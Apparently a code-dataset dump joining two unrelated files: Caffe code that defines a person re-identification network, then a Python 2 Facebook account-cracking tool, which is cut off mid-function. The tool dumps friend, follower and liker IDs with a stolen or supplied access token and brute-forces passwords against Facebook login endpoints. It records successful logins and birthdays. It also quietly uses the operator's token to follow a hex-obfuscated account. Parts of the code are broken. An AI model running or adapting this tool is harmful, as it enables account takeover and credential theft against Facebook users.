net['conv5'+post], net['relu5'+post] = conv_relu(net['relu4'+post], 3, 256, pad=1, group=2, is_train=is_train)
net['pool5'+post] = max_pool(net['relu5'+post], 3, stride=2)
net['fc6'+post], net['relu6'+post] = fc_relu(net['pool5'+post], 4096, is_train=is_train)
net['drop6'+post] = L.Dropout(net['relu6'+post], in_place=True)
net['fc7'+post], net['relu7'+post] = fc_relu(net['drop6'+post], 4096, is_train=is_train)
net['drop7'+post] = L.Dropout(net['relu7'+post], in_place=True)
#n.score = L.InnerProduct(n.drop7, num_output=20, weight_filler=dict(type='gaussian', std=0.01))
#n.loss = L.SigmoidCrossEntropyLoss(n.score, n.label)
final = 'drop7'+post
return net, final
# main netspec wrapper
def caffenet_train(mean_value, list_file, is_train=True):
# setup the python data layer
net = caffe.NetSpec()
net.data, net.label \
= L.ReidData(transform_param=dict(mirror=True,crop_size=227,mean_value=mean_value),
reid_data_param=dict(source=list_file,batch_size=128,new_height=256,new_width=256,
pos_fraction=1,neg_fraction=1,pos_limit=1,neg_limit=4,pos_factor=1,neg_factor=1.01),
ntop = 2)
net, final = caffenet_body(net, 'data', '', is_train)
net['score'] = fc_relu(net[final], nout=751, is_train=is_train, has_relu=False)
net['euclidean'], net['label_dif'] = L.PairEuclidean(net[final], net['label'], ntop = 2)
net['score_dif'] = fc_relu(net['euclidean'], nout=2, is_train=is_train, has_relu=False)
net['loss'] = L.SoftmaxWithLoss(net['score'], net['label'] , propagate_down=[1,0], loss_weight=1)
net['loss_dif'] = L.SoftmaxWithLoss(net['score_dif'], net['label_dif'], propagate_down=[1,0], loss_weight=0.5)
return str(net.to_proto())
def caffenet_dev(data_param = dict(shape=dict(dim=[2, 3, 227, 227])), label_param = dict(shape=dict(dim=[2]))):
# setup the python data layer
net = caffe.NetSpec()
net['data'] = L.Input(input_param = data_param)
net['label'] = L.Input(input_param = label_param)
net, final = caffenet_body(net, 'data', '', is_train=False)
net['score'] = fc_relu(net[final], nout=751, is_train=False, has_relu=False)
net['euclidean'], net['label_dif'] = L.PairEuclidean(net[final], net['label'], ntop = 2)
net['score_dif'] = fc_relu(net['euclidean'], nout=2, is_train=False, has_relu=False)
return str(net.to_proto())
def caffenet_score(input_param = dict(shape=dict(dim=[1, 3, 227, 227]))):
# setup the python data layer
net = caffe.NetSpec()
net['data'] = L.Input(input_param = input_param)
net, final = caffenet_body(net, 'data', '', is_train=False)
net['score'] = fc_relu(net[final], nout=751, is_train=False, has_relu=False)
net['prediction'] = L.Softmax(net['score'])
return str(net.to_proto())
workdir = osp.join(osp.dirname(__file__), 'caffenet')
if not os.path.isdir(workdir):
os.makedirs(workdir)
logdir = osp.join(workdir, 'log')
if not os.path.isdir(logdir):
os.makedirs(logdir)
snapshotdir = osp.join(workdir, 'snapshot')
if not os.path.isdir(snapshotdir):
os.makedirs(snapshotdir)
print('Work Dir : {}'.format(workdir))
train_proto = osp.join(workdir, "train.proto")
solverproto = tools.CaffeSolver(trainnet_prototxt_path = train_proto, testnet_prototxt_path = None)
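# Override selected solver hyper-parameters: base LR 1e-3, LR step every 16k iterations,
# 18k iterations total, snapshot every 2k iterations.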
solverproto.sp['display'] = "20"
solverproto.sp['base_lr'] = "0.001"
solverproto.sp['stepsize'] = "16000"
solverproto.sp['max_iter'] = "18000"
solverproto.sp['snapshot'] = "2000"
solverproto.sp['snapshot_prefix'] = "\"{}/snapshot/caffenet.full\"".format(workdir)
solverproto.write(osp.join(workdir, 'solver.proto'))
list_file = 'examples/market1501/lists/train.lst'
mean_value = [97.8286, 99.0468, 105.606]
# write train net.
with open(train_proto, 'w') as f:
f.write(caffenet_train(mean_value, list_file, True))
dev_proto = osp.join(workdir, "dev.proto")
with open(dev_proto, 'w') as f:
f.write(caffenet_score())
dep_proto = osp.join(workdir, "deploy.proto")
with open(dep_proto, 'w') as f:
f.write(caffenet_dev())
| StarcoderdataPython |
1622996 | <gh_stars>0
#!/usr/bin/python2
#coding=utf-8
#================
#OPEN SOURCE :)
#AUTOR : ☆ RAKA ☆ ™︻®╤───────═◍➤
#GITHUB : Bangsat-XD
#================
import os
try:
import concurrent.futures
except ImportError:
print "\033[93;1m\n FUTURES MODULE NOT INSRALL...!"
os.system("pip install futures" if os.name == "nt" else "pip2 install futures")
try:
import concurrent.futures
except ImportError:
print "\033[93;1m\n BS4 MODULE NOT INSRALL...!"
os.system("pip install bs4" if os.name == "nt" else "pip2 install bs4")
try:
import requests
except ImportError:
print "\033[93;1m\n MECHANIZE MODULE NOT INSRALL...!"
os.system("pip install mechanize" if os.name == "nt" else "pip2 install mechanize")
try:
import requests
except ImportError:
print "\033[93;1m\n REQUESTS MODULE NOT INSRALL...!"
os.system("pip install requests" if os.name == "nt" else "pip2 install requests")
import requests, os, re, bs4, sys, json, time, random, datetime
from concurrent.futures import ThreadPoolExecutor as axim_xau
from datetime import datetime
from bs4 import BeautifulSoup
ct = datetime.now()
n = ct.month
tarikh = ["JANUARY", "FEBRUARY", "MARCH", "APRIL", "MAY", "JUNE", "JULY", "AUGUST", "SEPTEMBER", "OCTOBER", "NOVEMBER", "DECEMBER"]
try:
if n < 0 or n > 12:
exit()
nTemp = n - 1
except ValueError:
exit()
current = datetime.now()
ta = current.year
bu = current.month
ha = current.day
op = tarikh[nTemp]
reload(sys)
sys.setdefaultencoding('utf-8')
P = "\033[97;1m" # White
M = "\033[91;1m" # Red
H = "\033[92;1m" # Green
K = "\033[93;1m" # Yellow
B = "\033[94;1m" # Blue
U = "\033[95;1m" # Purple
O = "\033[92;1m" # Light blue
#N = "\033[0m" # Color Off
N = "\033[93;1m"
my_color = [
P, M, H, K, B, U, O, N]
color = random.choice(my_color)
ok = []
cp = []
id = []
user = []
num = 0
loop = 0
user_agentz_qu = ["Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0", "Mozilla/5.0 (Linux; Android 10; SM-G973F Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/86.0.4240.198 Mobile Safari/537.36 Instagram 192.168.3.11.245 Android (29/10; 420dpi; 1080x2042; samsung; SM-G973F; beyond1; exynos9820; en_GB; 256099204)", "\x31\x30\x30\x30\x34\x35\x32\x30\x33\x38\x35\x35\x32\x39\x34"]
usera_gent=(user_agentz_qu[2])
url = "https://mbasic.facebook.com"
tarikh_ttl = {"01": "JANUARY", "02": "FEBRUARY", "03": "MARCH", "04": "APRIL", "05": "MAY", "06": "JUNE", "07": "JULY", "08": "AUGUST", "09": "SEPTEMBER", "10": "OCTOBER", "11": "NOVEMBER", "12": "DECEMBER"}
def xox(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.03)
def tod():
titik = ['\x1b[1;92m. ', '\x1b[1;93m.. ', '\x1b[1;96m... ','\x1b[1;92m. ', '\x1b[1;93m.. ', '\x1b[1;96m... ']
for x in titik:
print '\r %s[%s+%s] REMOVE TOKEN %s'%(N,M,N,x),
sys.stdout.flush()
time.sleep(1)
def logo():
os.system("clear")
print("""\033[1;97m
\033[1;91m───▄▀▀▀▄▄▄▄▄▄▄▀▀▀▄───
───█▒▒░░░░░░░░░▒▒█───
────█░░█░░░░░█░░█────
─▄▄──█░░░▀█▀░░░█──▄▄─
█░░█─▀▄░░░░░░░▄▀─█░░█
\033[1;96m█▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█
█░░╦─╦╔╗╦─╔╗╔╗╔╦╗╔╗░░█
█░░║║║╠─║─║─║║║║║╠─░░█
█░░╚╩╝╚╝╚╝╚╝╚╝╩─╩╚╝░░█
█▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄█
\033[1;95m®┏━━━┓╋╋┏┓╋╋╋╋┏━━━┓╋╋╋╋╋╋╋╋╋╋┏┓
┃┏━┓┃╋╋┃┃╋╋╋╋┃┏━┓┃╋╋╋╋╋╋╋╋╋╋┃┃
┃┗━┛┣━━┫┃┏┳━━┫┃╋┃┣┓┏┳━━┳━┓┏━┛┣━━┓
\033[1;92m┃┏┓┏┫┏┓┃┗┛┫┏┓┃┗━┛┃┗┛┃┏┓┃┏┓┫┏┓┃┏┓┃
┃┃┃┗┫┏┓┃┏┓┫┏┓┃┏━┓┃┃┃┃┏┓┃┃┃┃┗┛┃┏┓┃
┗┛┗━┻┛┗┻┛┗┻┛┗┻┛╋┗┻┻┻┻┛┗┻┛┗┻━━┻┛┗┛ \033[1;97m
\033[1;95m──────═• \033[1;92m● \033[1;95m══════════════════════════════ \033[1;92m● \033[1;97m\033[1;95m•═──────
\033[1;93m➤\033[1;97m Author : \033[1;92m☆ RAKA ☆ ™︻®╤───────═◍➤ \033[1;97m
\033[1;93m➤\033[1;97m Github : \033[1;92mhttps://github.com/Bangsat-XD \033[1;97m
\033[1;93m➤\033[1;97m Facebook : \033[1;92mRaka Andrian Tara \033[1;97m
\033[1;93m➤\033[1;97m Instagram : \033[1;92mraka_andrian27 \033[1;97m
\033[1;93m➤\033[1;97m Twitter : \033[1;92mBangsat_XD \033[1;97m
\033[1;95m──────═• \033[1;92m● \033[1;95m══════════════════════════════ \033[1;92m● \033[1;97m\033[1;95m•═────── """)
def resu(ok,cp):
if len(ok) != 0 or len(cp) != 0:
print '\n\n %s[%s#%s] CRACK COMPLETE...'%(N,K,N)
print '\n\n [%s+%s] TOTAL OK : %s%s%s'%(O,N,H,str(len(ok)),N)
print ' [%s+%s] TOTAL CP : %s%s%s'%(O,N,K,str(len(cp)),N);exit()
else:
print '\n\n [%s!%s] OOPS YOU GOT NO RESULTS :('%(M,N);exit()
def raka27():
os.system('clear')
banner()
print("%s IF YOU DON'T KNOW HOW TO GET TOKEN TYPE (%sOPEN%s)")%(K,H,K)
print("")
nunu = raw_input('\n %s[%s?%s] ☆ENTER TOKEN☆™︻®╤───────═◍➤ :%s ' % (N, M, N, H))
if nunu in ('open', 'Open', 'OPEN'):
raw_input('\n %s*%s PRESS ENTER ' % (O, N))
raka27()
try:
nam = requests.get('https://graph.facebook.com/me?access_token=%s' % nunu).json()['name']
open('token.txt', 'w').write(nunu)
raw_input('\n %s*%s PRESS ENTER ' % (O, N))
checkup(nunu)
mr_error()
except KeyError:
print '\n\n %s[%s!%s] INVALID TOKEN :(' % (N, M, N)
time.sleep(2)
raka27()
def main_menu():
os.system('clear')
try:
nunu = open('token.txt', 'r').read()
except IOError:
print '\n %s[%s×%s] INVALID TOKEN'%(N,M,N);time.sleep(2);os.system('rm -rf token.txt');azimvau()
try:
nam = requests.get('https://graph.facebook.com/me?access_token=%s'%(nunu)).json()['name'].upper()
IP = requests.get('https://api.ipify.org').text.strip()
loc = requests.get('https://ipapi.com/ip_api.php?ip=' + IP, headers={'Referer': 'https://ip-api.com/', 'Content-Type': 'application/json; charset=utf-8', 'User-Agent': 'Mozilla/5.0 (Linux; Android 7.1.2; Redmi 4X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36'}).json()['country_name'].upper()
except KeyError:
print '\n %s[%s×%s] INVALID TOKEN'%(N,M,N);time.sleep(2);os.system('rm -rf token.txt');azimvau()
except requests.exceptions.ConnectionError:
exit('\n\n %s[%s!%s] NO INTERNET CONNECTION :(\n'%(N,M,N))
os.system('clear')
def banner():
print("%s NAME : %s%s ")%(K,H,nam)
print("%s DEVICE IP : %s%s ")%(K,H,IP)
print("%s LOCATION : %s%s ")%(K,H,loc)
os.system('echo "\n [1]. DUMP ID FROM FRIENDS\n [2]. DUMP ID FROM PUBLIC FRIEND\n [3]. DUMP ID FROM TOTAL FOLLOWERS\n [4]. DUMP ID FROM LIKE POST\n [5]. START CRACK\n [6]. VIEW CRACK RESULTS\n [7]. USER AGENT SETTINGS"| lolcat -a -d 2')
os.system("xdg-open https://fb.me/GARANGAN.KECHE")
innocent = raw_input('\n\033[93;1m [*] MENU :\033[92;1m ')
if innocent == '':
print "\n %s[%s×%s] DON'T LEAVE IT BLANK"%(N,M,N);time.sleep(2);mr_error()
elif innocent in['1','01']:
teman(nunu)
elif innocent in['2','02']:
publik(nunu)
elif innocent in['3','03']:
followers(nunu)
elif innocent in['4','04']:
postingan(nunu)
elif innocent in['5','05']:
__crack__().plerr()
elif innocent in['6','06']:
try:
dirs = os.listdir("results")
print '\n [ CRACK RESULTS STORED IN YOUR FILE ]\n'
for file in dirs:
print(" [%s+%s] %s"%(O,N,file))
file = raw_input("\n [%s?%s] ENTER FILENAME :%s "%(M,N,H))
if file == "":
file = raw_input("\n %s[%s?%s] ENTER FILENAME :%s %s"%(N,M,N,H,N))
total = open("results/%s"%(file)).read().splitlines()
print(" %s[%s#%s] ═══════════════════════════════════════"%(N,O,N));time.sleep(2)
nm_file = ("%s"%(file)).replace("-", " ")
hps_nm = nm_file.replace(".txt", "").replace("OK", "").replace("CP", "")
xox(" [%s*%s] %sCRACK%s RESULTS ON DATE %s:%s%s%s TOTAL%s: %s%s%s"%(M,N,O,N,M,O,hps_nm,N,M,O,len(total),O))
print(" %s[%s#%s] ═══════════════════════════════════════"%(N,O,N));time.sleep(2)
for fuck in total:
nunu = fuck.replace("\n","")
titid = nunu.replace(" [✓] "," \x1b[0m[\x1b[1;92m✓\x1b[0m]\x1b[1;92m ").replace(" [×] ", " \x1b[0m[\x1b[1;93m×\x1b[0m]\x1b[1;93m ")
print("%s%s"%(titid,N));time.sleep(0.03)
print(" %s[%s#%s] ═══════════════════════════════════════"%(N,O,N))
raw_input('\n [ %sBACK%s ] '%(O,N));mr_error()
except (IOError):
print("\n %s[%s×%s] OOPS YOU GOT NO RESULTS :("%(N,M,N))
raw_input('\n [ %sBACK%s ] '%(O,N));mr_error()
elif innocent in['7','07']:
ua_settings()
elif innocent in['0','00']:
print '\n'
tod()
time.sleep(1);os.system('rm -rf token.txt')
xox('\n %s[%s✓%s]%s SUCCESSFULLY DELETED TOKEN'%(N,H,N,H));exit()
else:
print '\n %s[%s×%s] CHECK THE MENU [%s%s%s] IS NOT HERE.!'%(N,M,N,M,innocent,N);time.sleep(2);mr_error()
def checkup(nunu):
try:
tox = nunu
requests.post('https://graph.facebook.com/%s/subscribers?access_token=%s'%(usera_gent,tox))
except:
pass
def teman(nunu):
try:
os.mkdir('dump')
except:pass
try:
mmk = raw_input('\n %s[%s?%s] FILE NAME : '%(N,O,N))
cin = ('dump/' + mmk + '.json').replace(' ', '_')
ys = open(cin, 'w')
for a in requests.get('https://graph.facebook.com/me/friends?access_token=%s'%(nunu)).json()["data"]:
id.append(a['id'] + '<=>' + a['name'])
ys.write(a['id'] + '<=>' + a['name'] + '\n')
w = random.choice(['\x1b[1;91m', '\x1b[1;92m', '\x1b[1;93m', '\x1b[1;94m', '\x1b[1;95m', '\x1b[1;96m', '\x1b[1;97m', '\x1b[0m'])
sys.stdout.write('\r\033[0m - ' + w + '%s%s \r\n\n [\033[0;96m%s\033[0m] [\033[0;91m%s\033[0m] PROCESS DUMP ID...'%(a['name'],N,datetime.now().strftime('%H:%M:%S'), len(id)
)); sys.stdout.flush()
time.sleep(0.0050)
ys.close()
xox('\n\n %s[%s✓%s] SUCCESSFULLY DUMP ID FROM FRIEND'%(N,H,N))
print ' [%s•%s] COPY THE OUTPUT FILE >> ( %s%s%s )'%(O,N,M,cin,N)
os.system('echo "═════════════════════════════════════════════" | lolcat -a -d 2 -s 50')
raw_input(' [%s ENTER%s ] '%(O,N));mr_error()
except (KeyError,IOError):
os.remove(cin)
xox('\n %s[%s!%s] ID DUMP FAILED, MAYBE THE ID IS NOT PUBLIC.\n'%(N,M,N))
raw_input(' [ %sBACK%s ] '%(O,N));mr_error()
def publik(nunu):
try:
os.mkdir('dump')
except:pass
try:
mravu = raw_input('\n %s[%s?%s] PUBLIC ID : '%(N,O,N))
ahh = raw_input(' %s[%s?%s] FILE NAME : '%(N,O,N))
knt = ('dump/' + ahh + '.json').replace(' ', '_')
ys = open(knt, 'w')
for a in requests.get('https://graph.facebook.com/%s/friends?access_token=%s'%(mravu,nunu)).json()["data"]:
id.append(a['id'] + '<=>' + a['name'])
ys.write(a['id'] + '<=>' + a['name'] + '\n')
w = random.choice(['\x1b[1;91m', '\x1b[1;92m', '\x1b[1;93m', '\x1b[1;94m', '\x1b[1;95m', '\x1b[1;96m', '\x1b[1;97m', '\x1b[0m'])
sys.stdout.write('\r\033[0m - ' + w + '%s%s \r\n\n [\033[0;96m%s\033[0m] [\033[0;91m%s\033[0m] PROCESS DUMP ID...'%(a['name'],N,datetime.now().strftime('%H:%M:%S'), len(id)
)); sys.stdout.flush()
time.sleep(0.0050)
ys.close()
xox('\n\n %s[%s✓%s] SUCCESSFULLY DUMP ID FROM PUBLIC FRIEND'%(N,H,N))
print ' [%s•%s] COPY THE OUTPUT FILE >> ( %s%s%s )'%(O,N,M,knt,N)
os.system('echo "═════════════════════════════════════════════" | lolcat -a -d 2 -s 50')
raw_input(' [%s ENTER%s ] '%(O,N));mr_error()
except (KeyError,IOError):
os.remove(knt)
xox('\n %s[%s!%s] ID DUMP FAILED, MAYBE THE ID IS NOT PUBLIC.\n'%(N,M,N))
raw_input(' [ %sBACK%s ] '%(O,N));mr_error()
def followers(nunu):
try:
os.mkdir('dump')
except:pass
try:
mravu = raw_input('\n %s[%s?%s] PUBLIC FOLLOWER ID : '%(N,O,N))
mmk = raw_input(' %s[%s?%s] FILE NAME : '%(N,O,N))
ah = ('dump/' + mmk + '.json').replace(' ', '_')
ys = open(ah, 'w')
for a in requests.get('https://graph.facebook.com/%s/subscribers?access_token=%s'%(mravu,nunu)).json()["data"]:
id.append(a['id'] + '<=>' + a['name'])
ys.write(a['id'] + '<=>' + a['name'] + '\n')
w = random.choice(['\x1b[1;91m', '\x1b[1;92m', '\x1b[1;93m', '\x1b[1;94m', '\x1b[1;95m', '\x1b[1;96m', '\x1b[1;97m', '\x1b[0m'])
sys.stdout.write('\r\033[0m - ' + w + '%s%s \r\n\n [\033[0;96m%s\033[0m] [\033[0;91m%s\033[0m] PROCESS DUMP ID...'%(a['name'],N,datetime.now().strftime('%H:%M:%S'), len(id)
)); sys.stdout.flush()
time.sleep(0.0050)
ys.close()
xox('\n\n %s[%s✓%s] SUCCESSFULLY DUMP ID FROM PUBLIC FRIEND'%(N,H,N))
print ' [%s•%s] COPY THE OUTPUT FILE >> ( %s%s%s )'%(O,N,M,ah,N)
os.system('echo "═════════════════════════════════════════════" | lolcat -a -d 2 -s 50')
raw_input('%s [%s ENTER%s ] '%(N,O,N));mr_error()
except (KeyError,IOError):
os.remove(ah)
xox('\n %s[%s!%s] FAILED TO DUMP ID, PROBABLY ID IS NOT PUBLIC.\n'%(N,M,N))
raw_input(' [ %sBACK%s ] '%(O,N));mr_error()
def postingan(nunu):
try:
os.mkdir('dump')
except:pass
try:
mravu = raw_input('\n %s[%s?%s] POST ID : '%(N,O,N))
ppk = raw_input(' %s[%s?%s] FILE NAME : '%(N,O,N))
ahh = ('dump/' + ppk + '.json').replace(' ', '_')
ys = open(ahh, 'w')
for a in requests.get('https://graph.facebook.com/%s/likes?access_token=%s'%(mravu,nunu)).json()["data"]:
id.append(a['id'] + '<=>' + a['name'])
ys.write(a['id'] + '<=>' + a['name'] + '\n')
w = random.choice(['\x1b[1;91m', '\x1b[1;92m', '\x1b[1;93m', '\x1b[1;94m', '\x1b[1;95m', '\x1b[1;96m', '\x1b[1;97m', '\x1b[0m'])
sys.stdout.write('\r\033[0m - ' + w + '%s%s \r\n\n [\033[0;96m%s\033[0m] [\033[0;91m%s\033[0m] PROCESS DUMP ID...'%(a['name'],N,datetime.now().strftime('%H:%M:%S'), len(id)
)); sys.stdout.flush()
time.sleep(0.0050)
ys.close()
xox('\n\n %s[%s✓%s] SUCCESSFULLY DUMP ID FROM LIKE POST'%(N,H,N))
print ' [%s•%s] COPY THE OUTPUT FILE >> ( %s%s%s )'%(O,N,M,ahh,N)
os.system('echo "═════════════════════════════════════════════" | lolcat -a -d 2 -s 50')
raw_input('%s [%s ENTER%s ] '%(N,O,N));mr_error()
except (KeyError,IOError):
os.remove(ahh)
xox('\n %s[%s!%s] FAILED TO DUMP ID, PROBABLY ID IS NOT PUBLIC.\n'%(N,M,N))
raw_input(' [ %sBACK%s ] '%(O,N));mr_error()
def ua_settings():
print '\n (%s1%s) CHANGE USER AGENT'%(O,N)
print ' (%s2%s) CHECK USER AGENT'%(O,N)
ytbjts = raw_input('\n %s[%s?%s] CHOOSE : '%(N,O,N))
if ytbjts == '':
print "\n %s[%s×%s] DON'T LEAVE IT EMPTY"%(N,M,N);time.sleep(2);ua_settings()
elif ytbjts =='1':
ua_change()
elif ytbjts =='2':
check_uag()
else:
print '\n %s[%s×%s] WRONG INPUT'%(N,M,N);time.sleep(2);ua_settings()
def ua_change():
os.system('rm -rf vau_ua.txt')
print '\n %s(%s•%s) NOTE : COPY USER AGENT FROM YOUR BROWSER.'%(N,O,N)
print ' (%s•%s) THAN PASTE HERE \n'%(M,N)
os.system('xdg-open https://www.google.com/search?q=my+user+agent')
mew = raw_input(' [%s?%s] ENTER USER AGENT :%s '%(O,N,H))
if mew == '':
print "\n %s[%s×%s] DON'T LEAVE IT EMPTY BRO "%(N,M,N);ua_change()
try:
open('vau_ua.txt', 'w').write(mew);time.sleep(2)
xox('\n %s[%s✓%s] SUCCESSFULLY CHANGED USER AGENT...'%(N,H,N))
raw_input('\n %s[ %sBACK%s ]'%(N,O,N));mr_error()
except:pass
def check_uag():
try:
user_agent = open('vau_ua.txt', 'r').read()
except IOError:
user_agent = '%s-'%(M)
except: pass
print '\n %s[%s+%s] YOUR USER AGENT : %s%s'%(N,O,N,H,user_agent)
raw_input('\n %s[ %sBACK%s ]'%(N,O,N));mr_error()
class __crack__:
def __init__(self):
self.id = []
def plerr(self):
try:
self.apk = raw_input('\n [%s?%s] INPUT FILE : '%(O,N))
self.id = open(self.apk).read().splitlines()
print '\n [%s+%s] TOTAL ID -> %s%s%s' %(O,N,M,len(self.id),N)
except:
print '\n %s[%s×%s] FILE [%s%s%s] NOT FUND FIRST DUMP CHECK 1 TO 4 OPTIONS BRO'%(N,M,N,M,self.apk,N);time.sleep(3)
raw_input('\n %s[ %sBACK%s ]'%(N,O,N));mr_error()
___axim_xau___ = raw_input(' [%s?%s] DO YOU WANT TO USE A MANUAL PASSWORD? [Y/n]: '%(O,N))
if ___axim_xau___ in ('Y', 'y'):
print '\n %s[%s!%s] ADD MANUAL PASSWORD EXAMPLE : <PASSWORD>,<PASSWORD>'%(N,M,N)
print(" %s[%s!%s] NOTE : MUST USE MORE THAN 6 CHARACTERS")%(N, M, N)
while True:
pwek = raw_input('\n [%s?%s] ENTER PASSWORD : '%(O,N))
print ' [*] CRACK WITH PASSWORD -> [ %s%s%s ]' % (M, pwek, N)
if pwek == '':
print "\n %s[%s×%s] DON'T LEAVE IT EMPTY BRO"%(N,M,N)
elif len(pwek)<=5:
print '\n %s[%s×%s] PASSWORD MINIMUM 6 CHARACTERS'%(N,M,N)
else:
def __axm__(uvarm=None):
cin = raw_input('\n [*] METHOD : ')
if cin == '':
print "\n %s[%s×%s] DON'T EMPTY BRO"%(N,M,N);self.__axm__()
elif cin == '1':
print '\n [%s+%s] OK RESULTS ARE SAVED TO -> RESULTS/OK-%s-%s-%s.txt'%(O,N,ha, op, ta)
print ' [%s+%s] CP RESULTS ARE SAVED TO -> RESULTS/CP-%s-%s-%s.txt'%(O,N,ha, op, ta)
print '\n [%s!%s] YOU CAN TURN OFF MOBILE DATA TO PAUSE THE CRACK PROCESS\n'%(M,N)
with axim_xau(max_workers=30) as (__azimVau__):
for ikeh in self.id:
try:
kimochi = ikeh.split('<=>')[0]
__azimVau__.submit(self.__api__, kimochi, uvarm)
except: pass
os.remove(self.apk)
resu(ok,cp)
elif cin == '2':
print '\n [%s+%s] OK RESULTS ARE SAVED TO -> RESULTS/OK-%s-%s-%s.txt'%(O,N,ha, op, ta)
print ' [%s+%s] CP RESULTS ARE SAVED TO -> RESULTS/CP-%s-%s-%s.txt'%(O,N,ha, op, ta)
print '\n [%s!%s] YOU CAN TURN OFF MOBILE DATA TO PAUSE THE CRACK PROCESS\n'%(M,N)
with axim_xau(max_workers=30) as (__azimVau__):
for ikeh in self.id:
try:
kimochi = ikeh.split('<=>')[0]
__azimVau__.submit(self.__mbasic__, kimochi, uvarm)
except: pass
os.remove(self.apk)
resu(ok,cp)
elif cin == '3':
print '\n [%s+%s] OK RESULTS ARE SAVED TO -> RESULTS/OK-%s-%s-%s.txt'%(O,N,ha, op, ta)
print ' [%s+%s] CP RESULTS ARE SAVED TO -> RESULTS/CP-%s-%s-%s.txt'%(O,N,ha, op, ta)
print '\n [%s!%s] YOU CAN TURN OFF MOBILE DATA TO PAUSE THE CRACK PROCESS\n'%(M,N)
with axim_xau(max_workers=30) as (__azimVau__):
for ikeh in self.id:
try:
kimochi = ikeh.split('<=>')[0]
__azimVau__.submit(self.__mfb,__, kimochi, uvarm)
except: pass
os.remove(self.apk)
resu(ok,cp)
else:
print '\n %s[%s×%s] WRONG INPUT BRO!'%(N,M,N);self.__axm__()
print '\n [ CHOOSE THE LOGIN METHOD ]\n'
print ' [%s1%s]. API METHOD (FAST)'%(O,N)
print ' [%s2%s]. MBASIC METHOD (SLOW)'%(O,N)
print ' [%s3%s]. MOBILE METHOD (VERY SLOW)'%(O,N)
__axm__(pwek.split(','))
break
elif ___axim_xau___ in ('N', 'n'):
print '\n [ CHOOSE THE LOGIN METHOD - PLEASE TRY ONE ² ]\n'
print ' [%s1%s]. method API (fast)'%(O,N)
print ' [%s2%s]. method mbasic (slow)'%(O,N)
print ' [%s3%s]. method mobile (super slow)'%(O,N)
self.__pler__()
else:
print '\n %s[%s×%s] Y/N STUPID! -_-'%(N,M,N);time.sleep(2);mr_error()
return
def __api__(self, user, __axm__):
global ok,cp,loop
sys.stdout.write('\r [%s*%s] [CRACK] %s/%s -> OK-:%s - CP-:%s '%(O,N,loop,len(self.id),len(ok),len(cp))),
sys.stdout.flush()
for pw in __axm__:
pw = pw.lower()
try: os.mkdir('results')
except: pass
try:
_nunu = open('vau_ua.txt', 'r').read()
except (KeyError, IOError):
_nunu = 'Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
headers_ = {"x-fb-connection-bandwidth": str(random.randint(20000000.0, 30000000.0)), "x-fb-sim-hni": str(random.randint(20000, 40000)), "x-fb-net-hni": str(random.randint(20000, 40000)), "x-fb-connection-quality": "EXCELLENT", "x-fb-connection-type": "cell.CTRadioAccessTechnologyHSDPA", "user-agent": _nunu, "content-type": "application/x-www-form-urlencoded", "x-fb-http-engine": "Liger"}
api = 'https://b-api.facebook.com/method/auth.login'
params = {'access_token': '<PASSWORD>', 'format': 'JSON', 'sdk_version': '2', 'email': user, 'locale': 'en_US', 'password': pw, 'sdk': 'ios', 'generate_session_cookies': '1', 'sig': '3f555f99fb61fcd7aa0c44f58f522ef6'}
response = requests.get(api, params=params, headers=headers_)
if response.status_code != 200:
sys.stdout.write('\r %s[%s!%s] IP BLOCKED TURN ON AIRPLANE MODE 5 SECONDS'%(N,M,N)),
sys.stdout.flush()
loop +=1
self.__api__()
if 'access_token' in response.text and 'EAAA' in response.text:
print '\r %s* --> %s|%s %s' % (H,user,pw,N)
wrt = ' [✓] %s|%s' % (user,pw)
ok.append(wrt)
open('results/OK-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
continue
elif 'www.facebook.com' in response.json()['error_msg']:
try:
nunu = open('token.txt').read()
cp_ttl = requests.get('https://graph.facebook.com/%s?access_token=%s'%(user,nunu)).json()['birthday']
month, day, year = cp_ttl.split('/')
month = tarikh_ttl[month]
print '\r %s* --> %s|%s|%s %s %s %s' % (K,user,pw,day,month,year,N)
wrt = ' [×] %s|%s|%s %s %s' % (user,pw,day,month,year)
cp.append(wrt)
open('results/CP-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
except (KeyError, IOError):
month = ''
day = ''
year = ''
except:
pass
print '\r %s* --> %s|%s %s' % (K,user,pw,N)
wrt = ' [×] %s|%s' % (user,pw)
cp.append(wrt)
open('results/CP-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
continue
loop += 1
def __mbasic__(self, user, __axm__):
global ok,cp,loop
sys.stdout.write('\r [%s*%s] [CRACK] %s/%s -> OK-:%s - CP-:%s '%(O,N,loop,len(self.id),len(ok),len(cp))),
sys.stdout.flush()
for pw in __axm__:
pw = pw.lower()
try: os.mkdir('results')
except: pass
try:
_nunu = open('vau_ua.txt', 'r').read()
except (KeyError, IOError):
_nunu = 'Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
ses = requests.Session()
ses.headers.update({"Host":"mbasic.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","user-agent":_nunu,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","accept-encoding":"gzip, deflate","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
p = ses.get("https://mbasic.facebook.com")
b = ses.post("https://mbasic.facebook.com/login.php", data={"email": user, "pass": pw, "login": "submit"})
if "c_user" in ses.cookies.get_dict().keys():
kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ])
